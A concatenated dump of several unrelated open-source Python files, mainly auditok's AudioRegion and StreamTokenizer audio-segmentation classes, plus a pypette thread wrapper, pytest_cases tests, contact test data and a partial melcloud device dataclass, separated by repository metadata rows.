audio_source.read(skip_samples)
if max_read is not None:
if max_read < 0:
max_read = None
else:
max_read = round(max_read * audio_source.sampling_rate)
data = audio_source.read(max_read)
audio_source.close()
return (
data,
audio_source.sampling_rate,
audio_source.sample_width,
audio_source.channels,
)
def _check_convert_index(index, types, err_msg):
if not isinstance(index, slice) or index.step is not None:
raise TypeError(err_msg)
start = index.start if index.start is not None else 0
stop = index.stop
for index in (start, stop):
if index is not None and not isinstance(index, types):
raise TypeError(err_msg)
return start, stop
class _SecondsView:
"""A class to create a view of `AudioRegion` that can be sliced using
indices in seconds.
"""
def __init__(self, region):
self._region = region
def __getitem__(self, index):
err_msg = "Slicing AudioRegion by seconds requires indices of type "
err_msg += "'int' or 'float' without a step (e.g. region.sec[7.5:10])"
start_s, stop_s = _check_convert_index(index, (int, float), err_msg)
sr = self._region.sampling_rate
start_sample = int(start_s * sr)
stop_sample = None if stop_s is None else round(stop_s * sr)
return self._region[start_sample:stop_sample]
@property
def len(self):
"""
Return region duration in seconds.
"""
return self._region.duration
class _MillisView(_SecondsView):
"""A class to create a view of `AudioRegion` that can be sliced using
indices in milliseconds.
"""
def __getitem__(self, index):
err_msg = (
"Slicing AudioRegion by milliseconds requires indices of type "
)
err_msg += "'int' without a step (e.g. region.sec[500:1500])"
start_ms, stop_ms = _check_convert_index(index, (int), err_msg)
start_sec = start_ms / 1000
stop_sec = None if stop_ms is None else stop_ms / 1000
index = slice(start_sec, stop_sec)
return super(_MillisView, self).__getitem__(index)
def __len__(self):
"""
Return region duration in milliseconds.
"""
return round(self._region.duration * 1000)
@property
def len(self):
"""
Return region duration in milliseconds.
"""
return len(self)
class _AudioRegionMetadata(dict):
"""A class to store `AudioRegion`'s metadata."""
def __getattr__(self, name):
if name in self:
return self[name]
else:
err_msg = "AudioRegion metadata has no entry '{}'"
raise AttributeError(err_msg.format(name))
def __setattr__(self, name, value):
self[name] = value
def __str__(self):
return "\n".join("{}: {}".format(k, v) for k, v in self.items())
def __repr__(self):
return str(self)
class AudioRegion(object):
"""
AudioRegion encapsulates raw audio data and provides an interface to
perform simple operations on it. Use `AudioRegion.load` to build an
`AudioRegion` from different types of objects.
Parameters
----------
data : bytes
raw audio data as a bytes object
sampling_rate : int
sampling rate of audio data
sample_width : int
number of bytes of one audio sample
channels : int
number of channels of audio data
meta : dict, default: None
any collection of <key:value> elements used to build metadata for
this `AudioRegion`. Meta data can be accessed via `region.meta.key`
if `key` is a valid python attribute name, or via `region.meta[key]`
if not. Note that the :func:`split` function (or the
:meth:`AudioRegion.split` method) returns `AudioRegions` with a ``start``
and a ``stop`` meta values that indicate the location in seconds of the
region in original audio data.
See also
--------
AudioRegion.load
"""
def __init__(self, data, sampling_rate, sample_width, channels, meta=None):
check_audio_data(data, sample_width, channels)
self._data = data
self._sampling_rate = sampling_rate
self._sample_width = sample_width
self._channels = channels
self._samples = None
self.splitp = self.split_and_plot
if meta is not None:
self._meta = _AudioRegionMetadata(meta)
else:
self._meta = None
self._seconds_view = _SecondsView(self)
self.sec = self.seconds
self.s = self.seconds
self._millis_view = _MillisView(self)
self.ms = self.millis
@property
def meta(self):
return self._meta
@meta.setter
def meta(self, new_meta):
"""Meta data of audio region."""
self._meta = _AudioRegionMetadata(new_meta)
@classmethod
def load(cls, input, skip=0, max_read=None, **kwargs):
"""
Create an `AudioRegion` by loading data from `input`. See :func:`load`
for parameters descripion.
Returns
-------
region: AudioRegion
Raises
------
ValueError
raised if `input` is None and `skip` != 0 or `max_read` is None.
"""
if input is None:
if skip > 0:
raise ValueError(
"'skip' should be 0 when reading from microphone"
)
if max_read is None or max_read < 0:
raise ValueError(
"'max_read' should not be None when reading from "
"microphone"
)
data, sampling_rate, sample_width, channels = _read_chunks_online(
max_read, **kwargs
)
else:
data, sampling_rate, sample_width, channels = _read_offline(
input, skip=skip, max_read=max_read, **kwargs
)
return cls(data, sampling_rate, sample_width, channels)
@property
def seconds(self):
"""
A view to slice audio region by seconds (using ``region.seconds[start:end]``).
"""
return self._seconds_view
@property
def millis(self):
"""A view to slice audio region by milliseconds (using ``region.millis[start:end]``)."""
return self._millis_view
@property
def duration(self):
"""
Returns region duration in seconds.
"""
return len(self._data) / (
self.sampling_rate * self.sample_width * self.channels
)
@property
def sampling_rate(self):
"""Samling rate of audio data."""
return self._sampling_rate
@property
def sr(self):
"""Samling rate of audio data, alias for `sampling_rate`."""
return self._sampling_rate
@property
def sample_width(self):
"""Number of bytes per sample, one channel considered."""
return self._sample_width
@property
def sw(self):
"""Number of bytes per sample, alias for `sampling_rate`."""
return self._sample_width
@property
def channels(self):
"""Number of channels of audio data."""
return self._channels
@property
def ch(self):
"""Number of channels of audio data, alias for `channels`."""
return self._channels
def play(self, progress_bar=False, player=None, **progress_bar_kwargs):
"""
Play audio region.
Parameters
----------
progress_bar : bool, default: False
whether to use a progress bar while playing audio. Default: False.
`progress_bar` requires `tqdm`, if not installed, no progress bar
will be shown.
player : AudioPalyer, default: None
audio player to use. if None (default), use `player_for()`
to get a new audio player.
progress_bar_kwargs : kwargs
keyword arguments to pass to `tqdm` progress_bar builder (e.g.,
use `leave=False` to clean up the screen when play finishes).
"""
if player is None:
player = player_for(self)
player.play(
self._data, progress_bar=progress_bar, **progress_bar_kwargs
)
def save(self, file, audio_format=None, exists_ok=True, **audio_parameters):
"""
Save audio region to file.
Parameters
----------
file : str
path to output audio file. May contain `{duration}` placeholder
as well as any place holder that this region's metadata might
contain (e.g., regions returned by `split` contain metadata with
`start` and `end` attributes that can be used to build output file
name as `{meta.start}` and `{meta.end}`. See examples using
placeholders with formatting.
audio_format : str, default: None
format used to save audio data. If None (default), format is guessed
from file name's extension. If file name has no extension, audio
data is saved as a raw (headerless) audio file.
exists_ok : bool, default: True
If True, overwrite `file` if a file with the same name exists.
If False, raise an `IOError` if `file` exists.
audio_parameters: dict
any keyword arguments to be passed to audio saving backend.
Returns
-------
file: str
name of output file with replaced placehoders.
Raises
IOError if `file` exists and `exists_ok` is False.
Examples
--------
>>> region = AudioRegion(b'\\0' * 2 * 24000,
>>> sampling_rate=16000,
>>> sample_width=2,
>>> channels=1)
>>> region.meta.start = 2.25
>>> region.meta.end = 2.25 + region.duration
>>> region.save('audio_{meta.start}-{meta.end}.wav')
>>> audio_2.25-3.75.wav
>>> region.save('region_{meta.start:.3f}_{duration:.3f}.wav')
audio_2.250_1.500.wav
"""
if isinstance(file, str):
file = file.format(duration=self.duration, meta=self.meta)
if not exists_ok and os.path.exists(file):
raise FileExistsError("file '{file}' exists".format(file=file))
to_file(
self._data,
file,
audio_format,
sr=self.sr,
sw=self.sw,
ch=self.ch,
audio_parameters=audio_parameters,
)
return file
def split(
self,
min_dur=0.2,
max_dur=5,
max_silence=0.3,
drop_trailing_silence=False,
strict_min_dur=False,
**kwargs
):
"""Split audio region. See :func:`auditok.split()` for a comprehensive
description of split parameters.
See Also :meth:`AudioRegio.split_and_plot`.
"""
if kwargs.get("max_read", kwargs.get("mr")) is not None:
warn_msg = "'max_read' (or 'mr') should not be used with "
warn_msg += "AudioRegion.split_and_plot(). You should rather "
warn_msg += "slice audio region before calling this method"
raise RuntimeWarning(warn_msg)
return split(
self,
min_dur=min_dur,
max_dur=max_dur,
max_silence=max_silence,
drop_trailing_silence=drop_trailing_silence,
strict_min_dur=strict_min_dur,
**kwargs
)
def plot(
self,
scale_signal=True,
show=True,
figsize=None,
save_as=None,
dpi=120,
theme="auditok",
):
"""Plot audio region, one sub-plot for each channel.
Parameters
----------
scale_signal : bool, default: True
if true, scale signal by subtracting its mean and dividing by its
standard deviation before plotting.
show : bool
whether to show plotted signal right after the call.
figsize : tuple, default: None
width and height of the figure to pass to `matplotlib`.
save_as : str, default None.
if provided, also save plot to file.
dpi : int, default: 120
plot dpi to pass to `matplotlib`.
theme : str or dict, default: "auditok"
plot theme to use. Currently only "auditok" theme is implemented. To
provide you own them see :attr:`auditok.plotting.AUDITOK_PLOT_THEME`.
"""
try:
from auditok.plotting import plot
plot(
self,
scale_signal=scale_signal,
show=show,
figsize=figsize,
save_as=save_as,
dpi=dpi,
theme=theme,
)
except ImportError:
raise RuntimeWarning("Plotting requires matplotlib")
def split_and_plot(
self,
min_dur=0.2,
max_dur=5,
max_silence=0.3,
drop_trailing_silence=False,
strict_min_dur=False,
scale_signal=True,
show=True,
figsize=None,
save_as=None,
dpi=120,
theme="auditok",
**kwargs
):
"""Split region and plot signal and detections. Alias: :meth:`splitp`.
See :func:`auditok.split()` for a comprehensive description of split
parameters. Also see :meth:`plot` for plot parameters.
"""
try:
from auditok.plotting import plot
regions = self.split(
min_dur=min_dur,
max_dur=max_dur,
max_silence=max_silence,
drop_trailing_silence=drop_trailing_silence,
strict_min_dur=strict_min_dur,
**kwargs
)
regions = list(regions)
detections = ((reg.meta.start, reg.meta.end) for reg in regions)
eth = kwargs.get(
"energy_threshold", kwargs.get("eth", DEFAULT_ENERGY_THRESHOLD)
)
plot(
self,
scale_signal=scale_signal,
detections=detections,
energy_threshold=eth,
show=show,
figsize=figsize,
save_as=save_as,
dpi=dpi,
theme=theme,
)
return regions
except ImportError:
raise RuntimeWarning("Plotting requires matplotlib")
def __array__(self):
return self.samples
@property
def samples(self):
"""Audio region as arrays of samples, one array per channel."""
if self._samples is None:
self._samples = signal.to_array(
self._data, self.sample_width, self.channels
)
return self._samples
def __len__(self):
"""
Return region length in number of samples.
"""
return len(self._data) // (self.sample_width * self.channels)
@property
def len(self):
"""
Return region length in number of samples.
"""
return len(self)
def __bytes__(self):
return self._data
def __str__(self):
return (
"AudioRegion(duration={:.3f}, "
"sampling_rate={}, sample_width={}, channels={})".format(
self.duration, self.sr, self.sw, self.ch
)
)
def __repr__(self):
return str(self)
def __add__(self, other):
"""
Concatenates this region and `other` and return a new region.
Both regions must have the same sampling rate, sample width
and number of channels. If not, raises a `ValueError`.
"""
if not isinstance(other, AudioRegion):
raise TypeError(
"Can only concatenate AudioRegion, "
'not "{}"'.format(type(other))
)
if other.sr != self.sr:
raise ValueError(
"Can only concatenate AudioRegions of the same "
"sampling rate ({} != {})".format(self.sr, other.sr)
)
if other.sw != self.sw:
raise ValueError(
"Can only concatenate AudioRegions of the same "
"sample width ({} != {})".format(self.sw, other.sw)
)
if other.ch != self.ch:
raise ValueError(
"Can only concatenate AudioRegions of the same "
"number of channels ({} != {})".format(self.ch, other.ch)
)
data = self._data + other._data
return AudioRegion(data, self.sr, self.sw, self.ch)
def __radd__(self, other):
"""
Concatenates `other` and this region. `other` should be an
`AudioRegion` with the same audio parameters as this region
but can exceptionally be `0` to make it possible to concatenate
many regions with `sum`.
"""
if other == 0:
return self
return other.add(self)
def __mul__(self, n):
if not isinstance(n, int):
err_msg = "Can't multiply AudioRegion by a non-int of type '{}'"
raise TypeError(err_msg.format(type(n)))
data = self._data * n
return AudioRegion(data, self.sr, self.sw, self.ch)
def __rmul__(self, n):
return self * n
def __truediv__(self, n):
if not isinstance(n, int) or n <= 0:
raise TypeError("AudioRegion can only be divided by a positive int")
samples_per_sub_region, rest = divmod(len(self), n)
onset = 0
sub_regions = []
while onset < len(self):
offset = 0
if rest > 0:
offset = 1
rest -= 1
offset += onset + samples_per_sub_region
sub_regions.append(self[onset:offset])
onset = offset
return sub_regions
def __eq__(self, other):
if other is self:
return True
if not isinstance(other, AudioRegion):
return False
return (
(self._data == other._data)
and (self.sr == other.sr)
and (self.sw == other.sw)
and (self.ch == other.ch)
)
def __getitem__(self, index):
err_msg = "Slicing AudioRegion by samples requires indices of type "
err_msg += "'int' without a step (e.g. region.sec[1600:3200])"
start_sample, stop_sample = _check_convert_index(index, (int), err_msg)
bytes_per_sample = self.sample_width * self.channels
len_samples = len(self._data) // bytes_per_sample
if start_sample < 0:
start_sample = max(start_sample + len_samples, 0)
onset = start_sample * bytes_per_sample
if stop_sample is not None:
if stop_sample < 0:
stop_sample = max(stop_sample + len_samples, 0)
offset = index.stop * bytes_per_sample
else:
offset = None
data = self._data[onset:offset]
return AudioRegion(data, self.sr, self.sw, self.ch)
class StreamTokenizer:
"""
Class for stream tokenizers. It implements a 4-state automaton scheme
to extract sub-sequences of interest on the fly.
Parameters
----------
validator : callable, DataValidator (must implement `is_valid`)
called with each data frame read from source. Should take one positional
argument and return True or False for valid and invalid frames
respectively.
min_length : int
Minimum number of frames of a valid token. This includes all
tolerated non valid frames within the token.
max_length : int
Maximum number of frames of a valid token. This includes all
tolerated non valid frames within the token.
max_continuous_silence : int
Maximum number of consecutive non-valid frames within a token.
Note that, within a valid token, there may be many tolerated
*silent* regions that contain each a number of non valid frames up
to `max_continuous_silence`
init_min : int
Minimum number of consecutive valid frames that must be
**initially** gathered before any sequence of non valid frames can
be tolerated. This option is not always needed, it can be used to
drop non-valid tokens as early as possible. **Default = 0** means
that the option is by default ineffective.
init_max_silence : int
Maximum number of tolerated consecutive non-valid frames if the
number already gathered valid frames has not yet reached
'init_min'.This argument is normally used if `init_min` is used.
**Default = 0**, by default this argument is not taken into
consideration.
mode : int
mode can be one of the following:
-1 `StreamTokenizer.NORMAL` : do not drop trailing silence, and
accept a token shorter than `min_length` if it is the continuation
of the latest delivered token.
-2 `StreamTokenizer.STRICT_MIN_LENGTH`: if token `i` is delivered
because `max_length` is reached, and token `i+1` is immediately
adjacent to token `i` (i.e. token `i` ends at frame `k` and token
`i+1` starts at frame `k+1`) then accept token `i+1` only of it has
a size of at least `min_length`. The default behavior is to accept
token `i+1` event if it is shorter than `min_length` (provided that
the above conditions are fulfilled of course).
-3 `StreamTokenizer.DROP_TRAILING_SILENCE`: drop all tailing
non-valid frames from a token to be delivered if and only if it
is not **truncated**. This can be a bit tricky. A token is actually
delivered if:
- `max_continuous_silence` is reached.
- Its length reaches `max_length`. This is referred to as a
**truncated** token.
In the current implementation, a `StreamTokenizer`'s decision is only
based on already seen data and on incoming data. Thus, if a token is
truncated at a non-valid but tolerated frame (`max_length` is reached
but `max_continuous_silence` not yet) any tailing silence will be kept
because it can potentially be part of valid token (if `max_length` was
bigger). But if `max_continuous_silence` is reached before
`max_length`, the delivered token will not be considered as truncated
but a result of *normal* end of detection (i.e. no more valid data).
In that case the trailing silence can be removed if you use the
`StreamTokenizer.DROP_TRAILING_SILENCE` mode.
-4 `(StreamTokenizer.STRICT_MIN_LENGTH | StreamTokenizer.DROP_TRAILING_SILENCE)`:
use both options. That means: first remove tailing silence, then
check if the token still has a length of at least `min_length`.
Examples
--------
In the following code, without `STRICT_MIN_LENGTH`, the 'BB' token is
accepted although it is shorter than `min_length` (3), because it
immediately follows the latest delivered token:
>>> from auditok.core import StreamTokenizer
>>> from StringDataSource, DataValidator
>>> class UpperCaseChecker(DataValidator):
>>> def is_valid(self, frame):
return frame.isupper()
>>> dsource = StringDataSource("aaaAAAABBbbb")
>>> tokenizer = StreamTokenizer(validator=UpperCaseChecker(),
min_length=3,
max_length=4,
max_continuous_silence=0)
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'A'], 3, 6), (['B', 'B'], 7, 8)]
The following tokenizer will however reject the 'BB' token:
>>> dsource = StringDataSource("aaaAAAABBbbb")
>>> tokenizer = StreamTokenizer(validator=UpperCaseChecker(),
min_length=3, max_length=4,
max_continuous_silence=0,
mode=StreamTokenizer.STRICT_MIN_LENGTH)
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'A'], 3, 6)]
>>> tokenizer = StreamTokenizer(
>>> validator=UpperCaseChecker(),
>>> min_length=3,
>>> max_length=6,
>>> max_continuous_silence=3,
>>> mode=StreamTokenizer.DROP_TRAILING_SILENCE
>>> )
>>> dsource = StringDataSource("aaaAAAaaaBBbbbb")
>>> tokenizer.tokenize(dsource)
[(['A', 'A', 'A', 'a', 'a', 'a'], 3, 8), (['B', 'B'], 9, 10)]
The first token is delivered with its tailing silence because it is
truncated while the second one has its tailing frames removed.
Without `StreamTokenizer.DROP_TRAILING_SILENCE` the output would be:
.. code:: python
[
(['A', 'A', 'A', 'a', 'a', 'a'], 3, 8),
(['B', 'B', 'b', 'b', 'b'], 9, 13)
]
"""
SILENCE = 0
POSSIBLE_SILENCE = 1
POSSIBLE_NOISE = 2
NOISE = 3
NORMAL = 0
STRICT_MIN_LENGTH = 2
DROP_TRAILING_SILENCE = 4
def __init__(
self,
validator,
min_length,
max_length,
max_continuous_silence,
init_min=0,
init_max_silence=0,
mode=0,
):
if callable(validator):
self._is_valid = validator
elif isinstance(validator, DataValidator):
self._is_valid = validator.is_valid
else:
raise TypeError(
"'validator' must be a callable or an instance of "
"DataValidator"
)
if max_length <= 0:
raise ValueError(
"'max_length' must be > 0 (value={0})".format(max_length)
)
if min_length <= 0 or min_length > max_length:
err_msg = "'min_length' must be > 0 and <= 'max_length' (value={0})"
raise ValueError(err_msg.format(min_length))
if max_continuous_silence >= max_length:
err_msg = "'max_continuous_silence' must be < 'max_length' "
err_msg += "(value={0})"
raise ValueError(err_msg.format(max_continuous_silence))
if init_min >= max_length:
raise ValueError(
"'init_min' must be < 'max_length' (value={0})".format(
max_continuous_silence
)
)
self.validator = validator
self.min_length = min_length
self.max_length = max_length
self.max_continuous_silence = max_continuous_silence
self.init_min = init_min
self.init_max_silent = init_max_silence
self._set_mode(mode)
self._deliver = None
self._tokens = None
self._state = None
self._data = None
self._contiguous_token = False
self._init_count = 0
self._silence_length = 0
self._start_frame = 0
self._current_frame = 0
def _set_mode(self, mode):
strict_min_and_drop_trailing = StreamTokenizer.STRICT_MIN_LENGTH
strict_min_and_drop_trailing |= StreamTokenizer.DROP_TRAILING_SILENCE
if mode not in [
StreamTokenizer.NORMAL,
StreamTokenizer.STRICT_MIN_LENGTH,
StreamTokenizer.DROP_TRAILING_SILENCE,
strict_min_and_drop_trailing,
]:
raise ValueError("Wrong value for mode")
self._mode = mode
self._strict_min_length = (mode & self.STRICT_MIN_LENGTH) != 0
self._drop_trailing_silence = (mode & self.DROP_TRAILING_SILENCE) != 0
def _reinitialize(self):
self._contiguous_token = False
self._data = []
self._tokens = []
self._state = self.SILENCE
self._current_frame = -1
self._deliver = self._append_token
def tokenize(self, data_source, callback=None, generator=False):
"""
Read data from `data_source`, one frame a time, and process the read
frames in order to detect sequences of frames that make up valid
tokens.
:Parameters:
`data_source` : instance of the :class:`DataSource` class that
implements a `read` method. 'read' should return a slice of
signal, i.e. frame (of whatever type as long as it can be
processed by validator) and None if there is no more signal.
`callback` : an optional 3-argument function.
If a `callback` function is given, it will be called each time
a valid token is found.
:Returns:
A list of tokens if `callback` is None. Each token is tuple with the
following elements:
.. code python
(data, start, end)
where `data` is a list of read frames, `start`: index of the first
frame in the original data and `end` : index of the last frame.
"""
token_gen = self._iter_tokens(data_source)
if callback:
for token in token_gen:
callback(*token)
return
if generator:
return token_gen
return list(token_gen)
def _iter_tokens(self, data_source):
self._reinitialize()
while True:
frame = data_source.read()
self._current_frame += 1
if frame is None:
token = self._post_process()
if token is not None:
yield token
break
token = self._process(frame)
if token is not None:
yield token
def _process(self, frame): # noqa: C901
frame_is_valid = self._is_valid(frame)
if self._state == self.SILENCE:
if frame_is_valid:
# seems we got a valid frame after a silence
self._init_count = 1
self._silence_length = 0
self._start_frame = self._current_frame
self._data.append(frame)
if self._init_count >= self.init_min:
self._state = self.NOISE
if len(self._data) >= self.max_length:
return self._process_end_of_detection(True)
else:
self._state = self.POSSIBLE_NOISE
elif self._state == self.POSSIBLE_NOISE:
if frame_is_valid:
self._silence_length = 0
self._init_count += 1
self._data.append(frame)
if self._init_count >= self.init_min:
self._state = self.NOISE
if len(self._data) >= self.max_length:
return self._process_end_of_detection(True)
else:
self._silence_length += 1
if (
self._silence_length > self.init_max_silent
or len(self._data) + 1 >= self.max_length
):
# either init_max_silent or max_length is reached
# before _init_count, back to silence
self._data = []
self._state = self.SILENCE
else:
self._data.append(frame)
elif self._state == self.NOISE:
if frame_is_valid:
self._data.append(frame)
if len(self._data) >= self.max_length:
return self._process_end_of_detection(True)
elif self.max_continuous_silence <= 0:
# max token reached at this frame will _deliver if
# _contiguous_token and not _strict_min_length
self._state = self.SILENCE
return self._process_end_of_detection()
else:
# this is the first silent frame following a valid one
# and it is tolerated
self._silence_length = 1
self._data.append(frame)
self._state = self.POSSIBLE_SILENCE
if len(self._data) == self.max_length:
return self._process_end_of_detection(True)
# don't reset _silence_length because we still
# need to know the total number of silent frames
elif self._state == self.POSSIBLE_SILENCE:
if frame_is_valid:
self._data.append(frame)
self._silence_length = 0
self._state = self.NOISE
if len(self._data) >= self.max_length:
return self._process_end_of_detection(True)
else:
if self._silence_length >= self.max_continuous_silence:
self._state = self.SILENCE
if self._silence_length < len(self._data):
# _deliver only gathered frames aren't all silent
return self._process_end_of_detection()
self._data = []
self._silence_length = 0
else:
self._data.append(frame)
self._silence_length += 1
if len(self._data) >= self.max_length:
return self._process_end_of_detection(True)
# don't reset _silence_length because we still
# need to know the total number of silent frames
def _post_process(self):
if self._state == self.NOISE or self._state == self.POSSIBLE_SILENCE:
if len(self._data) > 0 and len(self._data) > self._silence_length:
return self._process_end_of_detection()
def _process_end_of_detection(self, truncated=False):
if (
not truncated
and self._drop_trailing_silence
and self._silence_length > 0
):
# happens if max_continuous_silence is reached
# or max_length is reached at a silent frame
self._data = self._data[0 : -self._silence_length]
if (len(self._data) >= self.min_length) or (
len(self._data) > 0
and not self._strict_min_length
and self._contiguous_token
):
start_frame = self._start_frame
end_frame = self._start_frame + len(self._data) - 1
data = self._data
self._data = []
token = (data, start_frame, end_frame)
if truncated:
# next token (if any) will start at _current_frame + 1
self._start_frame = self._current_frame + 1
# remember that it is contiguous with the just delivered one
self._contiguous_token = True
else:
self._contiguous_token = False
return token
else:
self._contiguous_token = False
self._data = []
def _append_token(self, data, start, end):
self._tokens.append((data, start, end))
| 36.259082 | 96 | 0.594609 |
32a79bf89c802d1d51223549312d705d2299f721 | 2,240 | py | Python | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 286 | 2017-10-28T10:08:42.000Z | 2022-02-24T06:55:08.000Z | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 14 | 2017-10-28T20:29:38.000Z | 2021-09-13T16:14:12.000Z | pypette/threadwrapper.py | csurfer/pypette | 4e0bfcc56d36d7fb56d381ffcd6e5e58cb9b3ca1 | [
"MIT"
] | 13 | 2017-10-29T03:17:19.000Z | 2022-02-21T14:53:06.000Z | # -*- coding: utf-8 -*-
"""
threadwrapper.api
~~~~~~~~~~~~~~~~~
Class definitions to create wrapper threads for jobs.
"""
import subprocess
from enum import Enum
from threading import Thread
from typing import Any, Optional
from .jobs import BashJob, Job
class ThreadState(Enum):
"""State in which a thread can be in."""
FAILED = 1
INIT = 2
RUNNING = 3
SUCCESS = 4
class JobTypes(Enum):
"""Different types of jobs to process"""
BASHJOB = 1
JOB = 2
PIPE = 3
class ThreadWrapper(Thread):
"""Wrapper around a thread to allow for exception handling and safe
job execution."""
def __init__(self, job: Any) -> None:
"""Constructor.
:param job: Job to run.
"""
self._job: Any = job
if isinstance(job, Job):
self._jobtype = JobTypes.JOB
super(ThreadWrapper, self).__init__(target=job.function, args=job.args, kwargs=job.kwargs)
elif isinstance(job, BashJob):
# Note that without lambda, subprocess.Popen runs immediately.
self._jobtype = JobTypes.BASHJOB
super(ThreadWrapper, self).__init__(target=lambda: subprocess.Popen(job.cmd).wait())
else:
self._jobtype = JobTypes.PIPE
super(ThreadWrapper, self).__init__(target=job.run)
self._state = ThreadState.INIT
self._exception: Optional[Exception] = None
def run(self) -> None:
"""Runs the thread in an exception free way."""
try:
self._state = ThreadState.RUNNING
super(ThreadWrapper, self).run()
if self._jobtype == JobTypes.PIPE:
self._state = self._job.state
else:
self._state = ThreadState.SUCCESS
except Exception as e:
self._state = ThreadState.FAILED
self._exception = e
@property
def job(self) -> Any:
"""Job being run by the thread."""
return self._job
@property
def state(self) -> ThreadState:
"""Thread's current state."""
return self._state
@property
def exception(self) -> Optional[Exception]:
"""Exception thrown by thread if any."""
return self._exception
| 25.747126 | 102 | 0.599554 |
39aa40925c8c3528abd5ae39d94a09117106796a | 868 | py | Python | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | import pytest
from pytest_cases import fixture_ref, pytest_parametrize_plus, pytest_fixture_plus
@pytest_fixture_plus
@pytest_parametrize_plus("variant", ['A', 'B'])
def book1(variant):
return variant
@pytest.fixture
def book2():
return
@pytest_parametrize_plus("name", [
fixture_ref(book1),
'hi',
'ih',
fixture_ref(book2),
])
def test_get_or_create_book(name):
print(name)
def test_synthesis(module_results_dct):
assert list(module_results_dct) == ['test_get_or_create_book[name_is_book1-A]',
'test_get_or_create_book[name_is_book1-B]',
'test_get_or_create_book[name_is_1to2-hi]',
'test_get_or_create_book[name_is_1to2-ih]',
'test_get_or_create_book[name_is_book2]']
| 27.125 | 83 | 0.624424 |
4ac3295d1ab1ea3cb6487826102dc63341ed421d | 797 | py | Python | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | 1 | 2020-11-03T20:45:32.000Z | 2020-11-03T20:45:32.000Z | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | null | null | null | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | null | null | null | from model.contact import Contact
import random
import string
testdata = [
Contact(firstname="firstname1", middlename="middlename1", lastname="lastname1", nickname="nickname1"),
Contact(firstname="firstname2", middlename="middlename2", lastname="lastname2", nickname="nickname2")
]
#def random_string(prefix, maxlen):
# symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
# return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
#testdata = [Contact(firstname="", middlename="", lastname="", nickname="")] + [
# Contact(firstname=random_string("firstname", 10), middlename=random_string("middlename", 20), lastname=random_string("lastname", 20), nickname=random_string("nickname", 20))
# for i in range(5)
#]
| 41.947368 | 178 | 0.720201 |
4ffe06343b1df24303291fca88815b7085792f34 | 7,686 | py | Python | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 12 | 2018-12-08T18:03:40.000Z | 2021-12-21T17:41:34.000Z | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 2 | 2020-05-28T18:35:09.000Z | 2020-05-29T08:57:08.000Z | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 11 | 2018-04-16T11:36:45.000Z | 2021-12-30T22:41:08.000Z | # coding=utf-8
from datetime import datetime
from typing import List
from dataclasses import dataclass
from melcloud.objects.preset import Preset
from melcloud.objects.weather import WeatherObservation
from melcloud.utils import str_to_datetime
__author__ = "Gareth Coles"
@dataclass
class Device:
access_level: int
adaptor_type: int
allow_dual_room_temperature: bool
area_id: int
area_name: str
boiler_status: bool
booster_heater_1_status: bool
booster_heater_2_plus_status: bool
booster_heater_2_status: bool
building_country: int
building_id: int
building_name: str
can_cool: bool
can_estimate_energy_usage: bool
can_heat: bool
can_measure_energy_consumed: bool
can_measure_energy_produced: bool
can_set_eco_hot_water: bool
can_set_flow_temperature: bool
can_set_forced_hot_water: bool
can_set_operation_mode: bool
can_set_power: bool
can_set_tank_temperature: bool
can_set_tank_water_temperature: bool
can_set_temperature_increment_override: bool
can_use_room_temperature_cooling: bool
cooling_energy_consumed_rate_1: int
cooling_energy_consumed_rate_2: int
cooling_energy_produced_rate_1: int
cooling_energy_produced_rate_2: int
CSV_report_1_min: bool
current_energy_consumed: int
current_energy_mode: object # ???
current_energy_produced: int
daily_energy_consumed_date: datetime
daily_energy_produced_date: datetime
date_created: datetime
DECC_report: bool
defrost_mode: int
detected_country: int
device_id: int
device_name: str
device_type: int
diagnostic_end_date: object # ???
diagnostic_mode: int
dip_switch_1: int
dip_switch_2: int
dip_switch_3: int
dip_switch_4: int
direct_access: bool
eco_hot_water: bool
effective_flags: 1
effective_pcycle: int
end_date: datetime
error_code: int
error_code_2_digit: int
expected_command: int
firmware_app_version: int
firmware_deployment: object # ???
firmware_update_aborted: bool
firmware_web_version: int
firmware_wlan_version: int
flash_writes: int
floor_id: int
floor_name: str
flow_temperature: int
flow_temperature_boiler: int
flow_temperature_zone_1: int
flow_temperature_zone_2: int
forced_hot_water_mode: bool
FTC_model: int
FTC_revision: str
FTC_version: int
has_eco_cute_settings: bool
has_energy_consumed_meter: bool
has_energy_produced_meter: bool
has_error: bool
has_error_messages: bool
has_FTC_45_settings: bool
has_hot_water_tank: bool
has_simplified_zone_2: bool
has_thermostat_zone_1: bool
has_thermostat_zone_2: bool
has_zone_2: bool
heating_energy_consumed_rate_1: int
heating_energy_consumed_rate_2: int
heating_energy_produced_rate_1: int
heating_energy_produced_rate_2: int
heating_function_enabled: bool
heat_pump_frequency: int
hide_dry_mode_control: bool
hide_outdoor_temperature: bool
hide_room_temperature: bool
hide_supply_temperature: bool
hide_vane_controls: bool
holiday_mode: bool
